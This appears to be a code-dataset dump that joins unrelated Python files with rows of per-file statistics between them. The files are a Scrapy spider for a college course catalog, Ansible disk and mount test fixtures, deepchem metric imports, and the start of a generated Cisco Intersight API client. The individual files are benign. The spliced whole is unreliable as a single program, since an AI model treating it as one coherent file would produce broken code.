        'HYDPNEU',
        'BAKING', 'BIOLOGY', 'BIOTECH', 'BLCKSMTH', 'BLDGS', 'BRCKMSN',
        'BUSADM',
        'CABMIL', 'CARP', 'CHEM', 'CHINESE', 'CIVILET', 'COLLSUCC', 'COMM',
        'COMPABE', 'COMPBSIC', 'COMPSOFT', 'CONST', 'CONSTRTR', 'COSMET',
        'COURT', 'CPL', 'CRIMJUST', 'CUL%20ARTS',
        'FARMBUS', 'FILM', 'FINANCE', 'FIRET', 'FOODS', 'FRENCH', 'FSHNMKTG',
        'IND%20MECH', 'INDMANUF', 'INDSGN', 'INGOVSRV', 'INSMGT', 'INSTHSKP',
        'INSURE', 'IT', 'ITCLOUD', 'ITNET', 'ITPROG', 'ITSECUR', 'ITTECSUP',
        'EARLYCHL', 'EARTHSCI', 'ECON', 'EDSVC', 'ELEC', 'ELECENG', 'ELECMIC',
        'ELECSERV', 'ELECT', 'EMS', 'ENERCONS', 'ENERSVS', 'ENG%20LANG',
        'ENGLABE', 'ENGLISH', 'EVENT', 'EVTMGT',
        'LABASST', 'LANG%20INT', 'LDRSHP', 'LITTRANS', 'LOGMGT',
        'MACHT', 'MASST', 'MATH', 'MATHABE', 'MCYCLE', 'MECHDR', 'MECTEC',
        'MED%20SUPP', 'MEDADMIN', 'MEDREC', 'MEDTERM', 'MILLWRGT', 'MKTG',
        'MTLFAB', 'MUSIC',
        'NATSCI', 'NONPROFT', 'NRSAD',
        'OPTOMET', 'ORIENT', 'OTASST',
        'PAINTDEC', 'PARALEG', 'PHARM', 'PHILOS', 'PHOTO', 'PHOTOVID',
        'PHYED', 'PHYSICS', 'PLASTIC', 'PLASTRDC', 'PLUMBNG', 'POLISCI',
        'PROF%20DEV', 'PRTPUB', 'PSYCH', 'PTASST',
        'RADTEC', 'READABE', 'READING', 'RECMGT', 'RENEWTHR', 'RESPC',
        'RLEST',
        'SCIABE', 'SHEETMTL', 'SMENG', 'SMLBUS', 'SOC', 'SOCSCABE', 'SOCSCI',
        'SPANISH', 'SPEECH', 'STDNTSUC', 'STEAM', 'STEELIRN', 'SUPDEV',
        'SURGT',
        'T%26D', 'TEL%26CBL', 'THERMASS',
        'VETTECH', 'VICOM',
        'GEN%20ST', 'GLBL%20ED', 'GLBLLANG', 'GRDSGN',
    ]

    # Subject codes offered as non-degree offerings (NDEG), in catalog order.
    _NDEG_SUBJECTS = [
        'ACCTGFIN', 'ANIMTOON', 'ART', 'ARTS',
        'BAKING', 'BIO%20TECH', 'BUS%26MKT',
        'DENTAL', 'DIETMGR', 'DRIVED',
        'CABMIL', 'CAREER', 'CARP', 'CNSTRCT', 'COMP%20PRO', 'COMPBSIC',
        'COMPSOFT', 'CONSEC', 'COOKING', 'COSMET', 'CRIMJUST',
        'EARLYCHL', 'EB%20TECH', 'ELEC', 'ELECSERV', 'ELECT', 'ELECTRIC',
        'EMS', 'ENG%20LANG', 'ENGLABE', 'ENRICH', 'EVENT',
        'FAMREL', 'FARMBUS', 'FIN%20PLAN', 'FIRET', 'FITNESS', 'FOODS',
        'HEALTH', 'HISTORY', 'HLTHCARE', 'HLTHINTR', 'HOME%20DEC',
        'HOMEINSP', 'HOMESHOP', 'HORT', 'HVAC',
        'INDUSTRY', 'INSURE',
        'GARDEN', 'GRAPHIC', 'GROUPDYN',
        'NONPROFT', 'NRSAD',
        'SCIENCE', 'SEWFIBER', 'SHEETMTL', 'SUPRMGMT',
        'PHOTOVID', 'PHYED', 'PLUMBNG', 'PROC%20IMP', 'PROF%20DEV',
        'MACHT', 'MATHABE', 'MCYCLE', 'MKTG', 'MUSICDNC',
        'WEB%20DSGN', 'WELLNESS', 'WRITEPUB', 'WRLDLANG',
        'READABE', 'REALEST', 'RELART',
    ]

    # Catalog listing URL per subject; the single-letter path segment is the
    # first character of the subject code.  The about page was listed several
    # times in the old list; once is sufficient.
    start_urls = (
        ['https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/'
         'MATC1/{0}/{1}/DEGR'.format(s[0], s) for s in _DEGR_SUBJECTS]
        + ['https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/'
           'MATC1/{0}/{1}/NDEG'.format(s[0], s) for s in _NDEG_SUBJECTS]
        + ['https://my.madisoncollege.edu/app/about']
    )

    def start_requests( self ):
        """Schedule every start URL, attaching the error callback."""
        for u in self.start_urls:
            yield scrapy.Request( u, callback = self.parse_httpbin,
                                  errback = self.errback_httpbin,
                                  dont_filter = True )

    def parse_httpbin( self, response ):
        """Yield a MatcLinksItem holding every <a href> on the page."""
        self.logger.info("Got successful response {}".format(response.url))
        items = MatcLinksItem()
        links = response.xpath('*//a/@href').extract()
        items['links'] = links
        yield items

    def errback_httpbin( self, failure):
        """Log the cause of each failed request.

        Distinguishes HTTP errors (non-200 responses passed through by the
        HttpError middleware), DNS failures, and timeouts.
        """
        # log all failures
        self.logger.error(repr(failure))
        if failure.check(HttpError):
            # These exceptions come from the HttpError spider middleware;
            # the non-200 response is available on the failure value.
            response = failure.value.response
            self.logger.error("HttpError on %s", response.url )
        elif failure.check(DNSLookupError):
            # This is the original request (fixed: format string was '%').
            request = failure.request
            self.logger.error('DNSLookupError on %s', request.url)
        elif failure.check( TimeoutError, TCPTimedOutError ):
            # Fixed: previously referenced undefined name TPCTimeOutError.
            request = failure.request
            self.logger.error('TimeoutError on %s', request.url)
| 175.387597
| 1,468
| 0.800928
| 2,868
| 22,625
| 6.314156
| 0.117503
| 0.22718
| 0.279474
| 0.319399
| 0.880336
| 0.877022
| 0.868629
| 0.866641
| 0.866641
| 0.863272
| 0
| 0.012945
| 0.033768
| 22,625
| 128
| 1,469
| 176.757813
| 0.815425
| 0.009724
| 0
| 0.092105
| 0
| 3.105263
| 0.8851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039474
| false
| 0
| 0.144737
| 0
| 0.236842
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
f41c4d6f70b1357efe53b4834143901d9f058b8d
| 13,051
|
py
|
Python
|
test/units/module_utils/facts/hardware/linux_data.py
|
Container-Projects/ansible-provider-docs
|
100b695b0b0c4d8d08af362069557ffc735d0d7e
|
[
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 37
|
2017-08-15T15:02:43.000Z
|
2021-07-23T03:44:31.000Z
|
test/units/module_utils/facts/hardware/linux_data.py
|
Container-Projects/ansible-provider-docs
|
100b695b0b0c4d8d08af362069557ffc735d0d7e
|
[
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 12
|
2018-01-10T05:25:25.000Z
|
2021-11-28T06:55:48.000Z
|
test/units/module_utils/facts/hardware/linux_data.py
|
Container-Projects/ansible-provider-docs
|
100b695b0b0c4d8d08af362069557ffc735d0d7e
|
[
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 49
|
2017-08-15T09:52:13.000Z
|
2022-03-21T17:11:54.000Z
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
# Captured `lsblk` output (device path plus filesystem/LVM UUID column) used as a
# fixture for block-device fact parsing. Deliberately includes devices with no
# UUID, and /dev/loop9 listed twice with two different UUIDs, to exercise the
# parser's handling of missing and duplicated entries.
LSBLK_OUTPUT = b"""
/dev/sda
/dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0
/dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK
/dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d
/dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce
/dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d
/dev/sr0
/dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390
/dev/loop1 7c1b0f30-cf34-459f-9a70-2612f82b870a
/dev/loop9 0f031512-ab15-497d-9abd-3a512b4a9390
/dev/loop9 7c1b4444-cf34-459f-9a70-2612f82b870a
/dev/mapper/docker-253:1-1050967-pool
/dev/loop2
/dev/mapper/docker-253:1-1050967-pool
"""
# Variant of LSBLK_OUTPUT whose mapper entry contains spaces in the device name
# ("an-example-mapper with a space in the name") — exercises parsing of device
# names that are not single whitespace-delimited tokens.
LSBLK_OUTPUT_2 = b"""
/dev/sda
/dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0
/dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK
/dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d
/dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce
/dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d
/dev/mapper/an-example-mapper with a space in the name 84639acb-013f-4d2f-9392-526a572b4373
/dev/sr0
/dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390
"""
# Expected device-path -> UUID mapping derived from lsblk output.
LSBLK_UUIDS = {'/dev/sda1': '66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK'}
# Sentinel UUID value used when udevadm reports no usable filesystem UUID.
UDEVADM_UUID = 'N/A'
# Captured `udevadm info` KEY=value export for a virtio partition (/dev/vda1);
# fixture for parsing device properties such as ID_FS_UUID and ID_FS_TYPE.
UDEVADM_OUTPUT = """
UDEV_LOG=3
DEVPATH=/devices/pci0000:00/0000:00:07.0/virtio2/block/vda/vda1
MAJOR=252
MINOR=1
DEVNAME=/dev/vda1
DEVTYPE=partition
SUBSYSTEM=block
MPATH_SBIN_PATH=/sbin
ID_PATH=pci-0000:00:07.0-virtio-pci-virtio2
ID_PART_TABLE_TYPE=dos
ID_FS_UUID=57b1a3e7-9019-4747-9809-7ec52bba9179
ID_FS_UUID_ENC=57b1a3e7-9019-4747-9809-7ec52bba9179
ID_FS_VERSION=1.0
ID_FS_TYPE=ext4
ID_FS_USAGE=filesystem
LVM_SBIN_PATH=/sbin
DEVLINKS=/dev/block/252:1 /dev/disk/by-path/pci-0000:00:07.0-virtio-pci-virtio2-part1 /dev/disk/by-uuid/57b1a3e7-9019-4747-9809-7ec52bba9179
"""
# Raw /etc/mtab-style content used as a mount-fact parsing fixture. The last
# few sshfs entries intentionally contain single quotes and apostrophes in the
# remote path (e.g. "foto's") to exercise quoting-safe parsing.
MTAB = """
sysfs /sys sysfs rw,seclabel,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
devtmpfs /dev devtmpfs rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755 0 0
securityfs /sys/kernel/security securityfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,seclabel,nosuid,nodev 0 0
devpts /dev/pts devpts rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,seclabel,nosuid,nodev,mode=755 0 0
tmpfs /sys/fs/cgroup tmpfs ro,seclabel,nosuid,nodev,noexec,mode=755 0 0
cgroup /sys/fs/cgroup/systemd cgroup rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd 0 0
pstore /sys/fs/pstore pstore rw,seclabel,nosuid,nodev,noexec,relatime 0 0
cgroup /sys/fs/cgroup/devices cgroup rw,nosuid,nodev,noexec,relatime,devices 0 0
cgroup /sys/fs/cgroup/freezer cgroup rw,nosuid,nodev,noexec,relatime,freezer 0 0
cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0
cgroup /sys/fs/cgroup/pids cgroup rw,nosuid,nodev,noexec,relatime,pids 0 0
cgroup /sys/fs/cgroup/blkio cgroup rw,nosuid,nodev,noexec,relatime,blkio 0 0
cgroup /sys/fs/cgroup/cpuset cgroup rw,nosuid,nodev,noexec,relatime,cpuset 0 0
cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct 0 0
cgroup /sys/fs/cgroup/hugetlb cgroup rw,nosuid,nodev,noexec,relatime,hugetlb 0 0
cgroup /sys/fs/cgroup/perf_event cgroup rw,nosuid,nodev,noexec,relatime,perf_event 0 0
cgroup /sys/fs/cgroup/net_cls,net_prio cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio 0 0
configfs /sys/kernel/config configfs rw,relatime 0 0
/dev/mapper/fedora_dhcp129--186-root / ext4 rw,seclabel,relatime,data=ordered 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct 0 0
debugfs /sys/kernel/debug debugfs rw,seclabel,relatime 0 0
hugetlbfs /dev/hugepages hugetlbfs rw,seclabel,relatime 0 0
tmpfs /tmp tmpfs rw,seclabel 0 0
mqueue /dev/mqueue mqueue rw,seclabel,relatime 0 0
/dev/loop0 /var/lib/machines btrfs rw,seclabel,relatime,space_cache,subvolid=5,subvol=/ 0 0
/dev/sda1 /boot ext4 rw,seclabel,relatime,data=ordered 0 0
/dev/mapper/fedora_dhcp129--186-home /home ext4 rw,seclabel,relatime,data=ordered 0 0
tmpfs /run/user/1000 tmpfs rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000 0 0
gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
fusectl /sys/fs/fuse/connections fusectl rw,relatime 0 0
grimlock.g.a: /home/adrian/sshfs-grimlock fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
grimlock.g.a:test_path/path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
grimlock.g.a:path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote-2 fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
grimlock.g.a:/mnt/data/foto's /home/adrian/fotos fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
"""
# Pre-split mount-table rows, one entry per mount:
# [device, mount_point, fstype, options, dump, passno].
# The '/dev/sdz3' and '/dev/sdz4' rows are synthetic (no counterpart in the raw
# MTAB text): one carries a 'none' fstype, the other stands in for a bind mount.
MTAB_ENTRIES = [
    ['sysfs', '/sys', 'sysfs', 'rw,seclabel,nosuid,nodev,noexec,relatime', '0', '0'],
    ['proc', '/proc', 'proc', 'rw,nosuid,nodev,noexec,relatime', '0', '0'],
    ['devtmpfs', '/dev', 'devtmpfs', 'rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755', '0', '0'],
    ['securityfs', '/sys/kernel/security', 'securityfs', 'rw,nosuid,nodev,noexec,relatime', '0', '0'],
    ['tmpfs', '/dev/shm', 'tmpfs', 'rw,seclabel,nosuid,nodev', '0', '0'],
    ['devpts', '/dev/pts', 'devpts', 'rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000', '0', '0'],
    ['tmpfs', '/run', 'tmpfs', 'rw,seclabel,nosuid,nodev,mode=755', '0', '0'],
    ['tmpfs', '/sys/fs/cgroup', 'tmpfs', 'ro,seclabel,nosuid,nodev,noexec,mode=755', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/systemd', 'cgroup',
     'rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd', '0', '0'],
    ['pstore', '/sys/fs/pstore', 'pstore', 'rw,seclabel,nosuid,nodev,noexec,relatime', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/devices', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,devices', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/freezer', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,freezer', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/memory', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,memory', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/pids', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,pids', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/blkio', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,blkio', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/cpuset', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,cpuset', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/cpu,cpuacct', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,cpu,cpuacct', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/hugetlb', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,hugetlb', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/perf_event', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,perf_event', '0', '0'],
    ['cgroup', '/sys/fs/cgroup/net_cls,net_prio', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,net_cls,net_prio', '0', '0'],
    ['configfs', '/sys/kernel/config', 'configfs', 'rw,relatime', '0', '0'],
    ['/dev/mapper/fedora_dhcp129--186-root', '/', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
    ['selinuxfs', '/sys/fs/selinux', 'selinuxfs', 'rw,relatime', '0', '0'],
    ['systemd-1', '/proc/sys/fs/binfmt_misc', 'autofs',
     'rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct', '0', '0'],
    ['debugfs', '/sys/kernel/debug', 'debugfs', 'rw,seclabel,relatime', '0', '0'],
    ['hugetlbfs', '/dev/hugepages', 'hugetlbfs', 'rw,seclabel,relatime', '0', '0'],
    ['tmpfs', '/tmp', 'tmpfs', 'rw,seclabel', '0', '0'],
    ['mqueue', '/dev/mqueue', 'mqueue', 'rw,seclabel,relatime', '0', '0'],
    ['/dev/loop0', '/var/lib/machines', 'btrfs', 'rw,seclabel,relatime,space_cache,subvolid=5,subvol=/', '0', '0'],
    ['/dev/sda1', '/boot', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
    # A 'none' fstype
    ['/dev/sdz3', '/not/a/real/device', 'none', 'rw,seclabel,relatime,data=ordered', '0', '0'],
    # lets assume this is a bindmount
    ['/dev/sdz4', '/not/a/real/bind_mount', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
    ['/dev/mapper/fedora_dhcp129--186-home', '/home', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
    ['tmpfs', '/run/user/1000', 'tmpfs',
     'rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000', '0', '0'],
    ['gvfsd-fuse', '/run/user/1000/gvfs', 'fuse.gvfsd-fuse',
     'rw,nosuid,nodev,relatime,user_id=1000,group_id=1000', '0', '0'],
    ['fusectl', '/sys/fs/fuse/connections', 'fusectl', 'rw,relatime', '0', '0'],
]
# Canned per-mount-point filesystem statistics (statvfs-style block/inode/size
# counters). '/not/a/real/bind_mount' deliberately maps to an empty dict to
# exercise the code path where no statvfs data is available for a mount.
STATVFS_INFO = {
    '/': {
        'block_available': 10192323,
        'block_size': 4096,
        'block_total': 12868728,
        'block_used': 2676405,
        'inode_available': 3061699,
        'inode_total': 3276800,
        'inode_used': 215101,
        'size_available': 41747755008,
        'size_total': 52710309888,
    },
    '/not/a/real/bind_mount': {},
    '/home': {
        'block_available': 1001578731,
        'block_size': 4096,
        'block_total': 105871006,
        'block_used': 5713133,
        'inode_available': 26860880,
        'inode_total': 26902528,
        'inode_used': 41648,
        'size_available': 410246647808,
        'size_total': 433647640576,
    },
    '/var/lib/machines': {
        'block_available': 10192316,
        'block_size': 4096,
        'block_total': 12868728,
        'block_used': 2676412,
        'inode_available': 3061699,
        'inode_total': 3276800,
        'inode_used': 215101,
        'size_available': 41747726336,
        'size_total': 52710309888,
    },
    '/boot': {
        'block_available': 187585,
        'block_size': 4096,
        'block_total': 249830,
        'block_used': 62245,
        'inode_available': 65096,
        'inode_total': 65536,
        'inode_used': 440,
        'size_available': 768348160,
        'size_total': 1023303680,
    },
}
# Mount points expected to be classified as bind mounts; corresponds to the
# synthetic /dev/sdz4 row in MTAB_ENTRIES, quoted here for reference:
# ['/dev/sdz4', '/not/a/real/bind_mount', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
BIND_MOUNTS = ['/not/a/real/bind_mount']
| 35.953168
| 154
| 0.586698
| 1,645
| 13,051
| 4.578116
| 0.210942
| 0.019918
| 0.072235
| 0.099588
| 0.80162
| 0.779445
| 0.761652
| 0.735759
| 0.725136
| 0.70482
| 0
| 0.11611
| 0.264194
| 13,051
| 362
| 155
| 36.052486
| 0.668125
| 0.058999
| 0
| 0.45509
| 0
| 0.095808
| 0.659953
| 0.404958
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002994
| 0
| 0.002994
| 0.002994
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f471e9e97ad1e29c96ba5bcb34ba989bacba0f2b
| 1,888
|
py
|
Python
|
deepchem/metrics/__init__.py
|
hsjang001205/deepchem
|
02fce35729826b1ef12a1cfa6519b491510217be
|
[
"MIT"
] | 1
|
2020-08-19T17:25:27.000Z
|
2020-08-19T17:25:27.000Z
|
deepchem/metrics/__init__.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2020-09-22T18:42:21.000Z
|
2020-09-22T18:42:21.000Z
|
deepchem/metrics/__init__.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2020-10-06T13:31:21.000Z
|
2020-10-06T13:31:21.000Z
|
# flake8: noqa
# metric class
from deepchem.metrics.metric import Metric
# metrics utils
from deepchem.metrics.metric import threshold_predictions
from deepchem.metrics.metric import normalize_weight_shape
from deepchem.metrics.metric import normalize_labels_shape
from deepchem.metrics.metric import normalize_prediction_shape
from deepchem.metrics.metric import handle_classification_mode
from deepchem.metrics.metric import to_one_hot
from deepchem.metrics.metric import from_one_hot
# sklearn & scipy score function
from deepchem.metrics.score_function import matthews_corrcoef
from deepchem.metrics.score_function import recall_score
from deepchem.metrics.score_function import kappa_score
from deepchem.metrics.score_function import cohen_kappa_score
from deepchem.metrics.score_function import r2_score
from deepchem.metrics.score_function import mean_squared_error
from deepchem.metrics.score_function import mean_absolute_error
from deepchem.metrics.score_function import precision_score
from deepchem.metrics.score_function import precision_recall_curve
from deepchem.metrics.score_function import auc
from deepchem.metrics.score_function import jaccard_score
from deepchem.metrics.score_function import f1_score
from deepchem.metrics.score_function import roc_auc_score
from deepchem.metrics.score_function import accuracy_score
from deepchem.metrics.score_function import balanced_accuracy_score
from deepchem.metrics.score_function import pearsonr
# original score function
from deepchem.metrics.score_function import pearson_r2_score
from deepchem.metrics.score_function import jaccard_index
from deepchem.metrics.score_function import pixel_error
from deepchem.metrics.score_function import prc_auc_score
from deepchem.metrics.score_function import rms_score
from deepchem.metrics.score_function import mae_score
from deepchem.metrics.score_function import bedroc_score
| 47.2
| 67
| 0.886123
| 264
| 1,888
| 6.090909
| 0.200758
| 0.231343
| 0.366294
| 0.343284
| 0.840174
| 0.76306
| 0.644901
| 0.299751
| 0
| 0
| 0
| 0.002296
| 0.077331
| 1,888
| 39
| 68
| 48.410256
| 0.920781
| 0.049788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
be49d4b8dd6aadb0548215e5d9f204bc5d5af78a
| 132,336
|
py
|
Python
|
intersight/api/iaas_api.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 21
|
2018-03-29T14:20:35.000Z
|
2021-10-13T05:11:41.000Z
|
intersight/api/iaas_api.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 14
|
2018-01-30T15:45:46.000Z
|
2022-02-23T14:23:21.000Z
|
intersight/api/iaas_api.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 18
|
2018-01-03T15:09:56.000Z
|
2021-07-16T02:21:54.000Z
|
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from intersight.api_client import ApiClient
from intersight.exceptions import (ApiTypeError, ApiValueError)
class IaasApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Bind this API wrapper to an ``ApiClient``.

    :param api_client: transport client to use; when ``None`` a default
                       ``ApiClient()`` is constructed.
    """
    # An explicitly supplied (possibly pre-configured) client is kept as-is;
    # only a missing one is replaced with a fresh default instance.
    self.api_client = ApiClient() if api_client is None else api_client
def delete_iaas_ucsd_info(self, moid, **kwargs):  # noqa: E501
    """Delete a 'iaas.UcsdInfo' resource. # noqa: E501

    The request is synchronous unless ``async_req=True`` is passed, in
    which case the request thread is returned instead of the result.

    >>> thread = api.delete_iaas_ucsd_info(moid, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: total request timeout in seconds, or a
                             (connection, read) timeout tuple.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper only want the response body, so
    # ask the low-level variant to drop the (status, headers) wrapper.
    kwargs['_return_http_data_only'] = True
    return self.delete_iaas_ucsd_info_with_http_info(moid, **kwargs)  # noqa: E501
def delete_iaas_ucsd_info_with_http_info(self, moid,
                                         **kwargs):  # noqa: E501
    """Delete a 'iaas.UcsdInfo' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_iaas_ucsd_info_with_http_info(moid, async_req=True)
    >>> result = thread.get()
    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Snapshot the call's local names (self, moid, kwargs). Taken first so it
    # can serve below as a flat, mutable bag of request options.
    local_var_params = locals()
    # Keyword arguments this endpoint accepts via **kwargs.
    all_params = ['moid']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject unknown keyword arguments, folding known ones into the flat dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError("Got an unexpected keyword argument '%s'"
                               " to method delete_iaas_ucsd_info" % key)
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'moid' is set
    if self.api_client.client_side_validation and (
            'moid' not in local_var_params or  # noqa: E501
            local_var_params['moid'] is None):  # noqa: E501
        raise ApiValueError(
            "Missing the required parameter `moid` when calling `delete_iaas_ucsd_info`"
        )  # noqa: E501
    collection_formats = {}
    # 'Moid' is substituted into the {Moid} placeholder of the request path.
